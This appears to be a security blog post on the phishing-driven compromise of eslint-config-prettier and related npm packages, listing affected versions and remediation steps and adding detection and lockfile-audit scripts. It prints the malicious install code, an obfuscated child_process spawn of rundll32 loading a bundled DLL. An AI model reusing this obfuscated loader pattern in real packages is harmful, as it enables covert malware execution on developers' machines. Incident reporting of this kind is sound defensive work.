We are currently investigating a potential supply chain security incident involving the eslint-config-prettier npm package. This widely-used package, which helps developers maintain consistent code formatting by turning off ESLint rules that conflict with Prettier, appears to have had multiple versions published with suspicious modifications.
⚠️ This is a developing situation, and we are actively investigating the incident. This post will be updated as more information becomes available. Please refer to the GitHub issue for more details.
Update: Maintainer Confirms Supply Chain Attack
On July 18, 2025, the maintainer of eslint-config-prettier and other related packages, JounQin, confirmed via this tweet that he was the victim of a phishing attack. The attacker added a malicious npm token and subsequently published several compromised versions of popular packages maintained by him.
“I was tricked by a phishing email and a new npm token was added and leaked then some popular packages I’m maintaining were released with malicious software. I’ve deleted the leaked token and marked all affected bad versions as deprecated and released new versions.” — JounQin on X
Confirmed Affected Packages and Versions
The following packages and versions were confirmed to be compromised:
- eslint-config-prettier
  - 8.10.1
  - 9.1.1
  - 10.1.6
  - 10.1.7
- eslint-plugin-prettier
  - 4.2.2
  - 4.2.3
- synckit
  - 0.11.9
- @pkgjs/core
  - 0.2.8
- napi-postinstall
  - 0.3.1
These versions have been marked as deprecated on npm and new clean versions have been published by the maintainer.
Summary of the Incident
Between versions 10.1.5 and 10.1.7, the eslint-config-prettier package has had four new versions published to npm with no corresponding code changes in the repository. This unusual activity has raised immediate security concerns, as legitimate package updates typically correspond with actual code changes in the source repository. Here is the screenshot @dasa shared on the GitHub issue.

Key Observations
Multiple versions (10.1.6 through 10.1.9) were published to npm without any matching commits or changes in the GitHub repository.
The package diff shows unexpected modifications between versions: https://app.renovatebot.com/package-diff?name=eslint-config-prettier&from=10.1.5&to=10.1.7
GitHub user martincostello mentioned on the GitHub issue that the compromised version installs a DLL. The functionality of the DLL is currently unknown. Based on this analysis, it appears that the malicious code only impacts Windows.
    // Windows-only gate: nothing runs on other platforms
    if(os.platform() === 'win32') {
      const tempDir = os.tmpdir();
      // The split string literals reassemble to require('child_process').spawn('rundll32', ...),
      // which defeats a simple search of the package source for those names.
      // rundll32 loads the node-gyp.dll shipped inside the package and calls its "main" export.
      require('chi'+'ld_pro'+'cess')["sp"+"awn"]("rund"+"ll32",
        [path.join(__dirname, './node-gyp' + '.dll') + ",main"]);
      // Temp-directory listing around the launch; `log` and `cache` are presumably
      // defined elsewhere in the install script (not shown in this excerpt).
      log(`Temp directory: ${tempDir}`);
      const files = cache.readdirSync(tempDir);
      log(`Number of files in temp directory: ${files.length}`);
    }
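The string splitting in the excerpt above (`'chi'+'ld_pro'+'cess'`, `"sp"+"awn"`, `"rund"+"ll32"`) means a plain grep of the package for `child_process` or `rundll32` finds nothing. As an added illustration, not code from the post or from the package, the following Node script first joins adjacent string-literal concatenations back together and only then matches the indicators that are visible in the excerpt. The indicator list and both sample inputs are constructed here from the snippet above; `joinSplitStrings` and `findIndicators` are names chosen for this example.

```javascript
// Added example: normalise split string literals, then look for the
// indicators present in the compromised install code quoted above.
// Heuristic, illustrative detection logic; not code from the post or the package.

// Matches  'abc' + "def"  (any quote style on each side) so it can be
// collapsed to 'abcdef'. Backslash escapes are deliberately excluded to
// keep the regex simple.
const CONCAT_RE = /(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3/g;

// Repeatedly join adjacent literals until the source stops changing,
// so 'a'+'b'+'c' collapses fully.
function joinSplitStrings(source) {
  let prev;
  let out = source;
  do {
    prev = out;
    out = out.replace(CONCAT_RE, (_m, _q1, a, _q2, b) => `'${a}${b}'`);
  } while (out !== prev);
  return out;
}

// Indicators derived from the quoted excerpt (constructed for this example).
const INDICATORS = [
  { id: 'child_process-require', re: /require\(\s*['"]child_process['"]\s*\)/ },
  { id: 'spawn-call',            re: /\[\s*['"]spawn['"]\s*\]|\.spawn\s*\(/ },
  { id: 'rundll32',              re: /['"]rundll32['"]/ },
  { id: 'dll-in-package',        re: /['"][^'"]*\.dll['"]/ },
  { id: 'win32-gate',            re: /os\.platform\(\)\s*===\s*['"]win32['"]/ },
];

// Returns the ids of all indicators found in the de-split source text,
// in the order they are listed above.
function findIndicators(source) {
  const normalised = joinSplitStrings(source);
  return INDICATORS.filter((i) => i.re.test(normalised)).map((i) => i.id);
}

// Constructed sample: the excerpt quoted in the post, minus the log lines.
const SAMPLE_INSTALL_JS = [
  "if(os.platform() === 'win32') {",
  '  const tempDir = os.tmpdir();',
  `  require('chi'+'ld_pro'+'cess')["sp"+"awn"]("rund"+"ll32",`,
  `    [path.join(__dirname, './node-gyp' + '.dll') + ",main"]);`,
  '  const files = cache.readdirSync(tempDir);',
  '}',
].join('\n');

// Constructed benign sample for comparison: same temp-directory listing, no launch.
const SAMPLE_BENIGN_JS = "const files = require('fs').readdirSync(require('os').tmpdir());";

console.log('suspicious:', findIndicators(SAMPLE_INSTALL_JS));
console.log('benign:', findIndicators(SAMPLE_BENIGN_JS));
```

Run it with `node` over a file's contents read into a string; every copy of a package under `node_modules` should be checked, including nested ones. The joined-literal pass is the part worth keeping: the individual indicators are specific to this incident, but concatenated literals around `require` are worth flagging in any install script.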
Automated Dependabot / Renovatebot Dependency Updates
We are aware of several instances where automated dependency management tools have upgraded projects to the potentially vulnerable versions:
- Dependabot and Renovate Bot have created pull requests upgrading to versions 10.1.6, 10.1.7, 10.1.8, and 10.1.9
- These pull requests have been merged in multiple repositories, potentially exposing them to compromise
- The exact nature and scope of the potential compromise is still under investigation
Example of affected pull request: nx-extensions PR #216.

Immediate Recommendations
While our investigation continues, we recommend the following precautionary measures:
Pin to a safer version
If you are using eslint-config-prettier, immediately pin your dependency to a safer version.
Review Recent Dependency Updates
Check if your project has recently updated eslint-config-prettier to versions 10.1.6 or higher through automated pull requests or manual updates.
Audit Your CI/CD Pipelines
Review your CI/CD logs for any unusual activity if you've recently updated to the affected versions.
Monitor for Updates
Follow this blog post and official issue thread for the latest updates.
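As an added example, not code from the post, here is a Node script that carries out the "review recent dependency updates" and "pin to a safer version" steps above: it walks an npm lockfile (v1 `dependencies` tree or v2/v3 `packages` map), reports every installed copy, nested ones included, whose version is on the confirmed list, and shows how an npm `overrides` entry forces a chosen version across the tree. The lockfiles are constructed inline; the affected versions are those the maintainer confirmed above (the post's "snyckit" is the npm package `synckit`); the pin value 10.1.5 is the pre-incident version named in the post; function names are this example's own.

```javascript
// Added example: audit an npm lockfile for the versions confirmed as
// compromised in this incident, and pin a clean version via "overrides".
// Illustrative code; not from the post, the package or npm.

// Confirmed affected versions as listed by the maintainer (the post's
// "snyckit" is the npm package synckit).
const COMPROMISED = {
  'eslint-config-prettier': ['8.10.1', '9.1.1', '10.1.6', '10.1.7'],
  'eslint-plugin-prettier': ['4.2.2', '4.2.3'],
  synckit: ['0.11.9'],
  '@pkgjs/core': ['0.2.8'],
  'napi-postinstall': ['0.3.1'],
};

// "node_modules/a/node_modules/@scope/b" -> "@scope/b";
// "" (the root project entry in v2/v3 lockfiles) -> null.
function packageNameFromLockPath(lockPath) {
  const marker = 'node_modules/';
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

function isCompromised(name, version, table) {
  return Boolean(table[name] && table[name].includes(version));
}

// Lockfile v1 keeps a nested "dependencies" tree; walk it recursively so
// transitive copies are checked too.
function walkV1(deps, prefix, table, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const lockPath = `${prefix}node_modules/${name}`;
    if (isCompromised(name, entry.version, table)) {
      hits.push({ path: lockPath, name, version: entry.version });
    }
    walkV1(entry.dependencies, `${lockPath}/`, table, hits);
  }
}

// Returns every installed copy (top-level or nested) whose version is in
// the table, in lockfile order.
function findCompromised(lockfile, table = COMPROMISED) {
  const hits = [];
  if (lockfile.packages) {
    // v2/v3: flat map keyed by install path.
    for (const [lockPath, entry] of Object.entries(lockfile.packages)) {
      const name = packageNameFromLockPath(lockPath);
      if (name && isCompromised(name, entry.version, table)) {
        hits.push({ path: lockPath, name, version: entry.version });
      }
    }
  } else {
    walkV1(lockfile.dependencies, '', table, hits);
  }
  return hits;
}

// Returns a copy of package.json with an npm "overrides" entry forcing every
// copy of `name` in the tree to `version`; run `npm install` afterwards to
// regenerate the lockfile.
function addOverride(packageJson, name, version) {
  return { ...packageJson, overrides: { ...(packageJson.overrides || {}), [name]: version } };
}

// Constructed lockfile (v3) with one top-level and one nested bad version.
const SAMPLE_LOCKFILE = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', devDependencies: { 'eslint-config-prettier': '^10.1.5' } },
    'node_modules/eslint-config-prettier': { version: '10.1.7' },
    'node_modules/prettier': { version: '3.3.3' },
    'node_modules/eslint-plugin-prettier': { version: '5.1.3' },
    'node_modules/eslint-plugin-prettier/node_modules/synckit': { version: '0.11.9' },
    'node_modules/@pkgjs/core': { version: '0.2.7' },
  },
};

// Constructed lockfile (v1) with the same tree, for the recursive path.
const SAMPLE_LOCKFILE_V1 = {
  lockfileVersion: 1,
  dependencies: {
    'eslint-config-prettier': { version: '10.1.7' },
    'eslint-plugin-prettier': { version: '5.1.3', dependencies: { synckit: { version: '0.11.9' } } },
  },
};

for (const f of findCompromised(SAMPLE_LOCKFILE)) {
  console.log(`COMPROMISED ${f.name}@${f.version} at ${f.path}`);
}
// Pin to the pre-incident version named in the post (10.1.5).
console.log(JSON.stringify(addOverride({ name: 'example-app' }, 'eslint-config-prettier', '10.1.5')));
```

Read the real file with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and pass it to `findCompromised`; a hit on a nested path means the bad version arrived transitively, so pinning the direct dependency alone is not enough and an `overrides` entry (or the maintainer's new clean release) is needed.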
Next Steps
We are continuing our investigation into this incident and will provide updates as more information becomes available. Key areas of ongoing investigation include:
- Determining the exact nature of the modifications in the published packages
- Identifying the attack vector used to publish unauthorized versions
- Assessing the potential impact on affected projects
- Working with the package maintainers and npm to understand how this occurred
Stay Updated
This is an evolving situation. We will update this post as our investigation progresses and more information becomes available.
References
https://github.com/prettier/eslint-config-prettier/issues/339
https://app.renovatebot.com/package-diff?name=eslint-config-prettier&from=10.1.5&to=10.1.7